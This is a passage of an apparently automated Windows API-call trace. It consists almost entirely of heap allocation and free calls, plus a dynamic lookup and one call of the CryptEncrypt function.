[0187.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0187.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0187.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0187.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0187.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0187.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0187.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0187.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0187.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0187.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0187.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0187.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0187.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0187.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0187.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0187.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0187.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0187.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0187.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0187.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0187.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0187.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0187.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0187.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0187.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0187.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0187.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0187.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0187.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0187.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0187.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11660) returned 0x3bf16b0 [0187.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf16b0 | out: hHeap=0x970000) returned 1 [0187.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0187.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0187.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0187.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0187.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0187.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0187.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0187.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0187.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0187.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0187.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0187.714] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0187.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0187.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0187.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0187.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0187.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0187.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0187.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0187.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0187.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0187.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0187.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0187.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0187.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0187.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0187.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0187.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0187.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0187.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0187.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0187.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0187.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0187.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0187.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0187.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0187.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0187.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0187.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0187.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0187.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0187.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0187.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0187.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0187.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0187.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0187.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0187.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0187.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0187.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0187.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0187.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0187.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0187.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0187.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0187.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0187.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0187.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0187.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0187.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0187.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0187.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0187.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0187.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0187.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0187.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0187.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0187.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0187.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0187.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0187.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0187.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0187.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0187.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0187.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50c38 [0187.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0187.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0187.719] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0187.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0187.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e542b0 [0187.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0187.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0187.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0187.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0187.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0187.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0187.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0187.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0187.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0187.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0187.772] CryptEncrypt (in: hKey=0xa87390, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x11660, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x11668) returned 1 [0187.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0187.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0187.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0187.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0187.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0187.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0187.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0187.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0187.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0187.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0187.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0187.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0187.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0187.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0187.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0187.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0187.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0187.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0187.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0187.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0187.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0187.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0187.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0187.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0187.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0187.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0187.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0187.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0187.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0187.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0187.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0187.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0187.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0187.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0187.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0187.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0187.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0187.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0187.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0187.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0187.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0187.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0187.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0187.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0187.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0187.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0187.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0187.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0187.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0187.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0187.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0187.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0187.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0187.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0187.776] HeapFree (in: hHeap=0x970000, 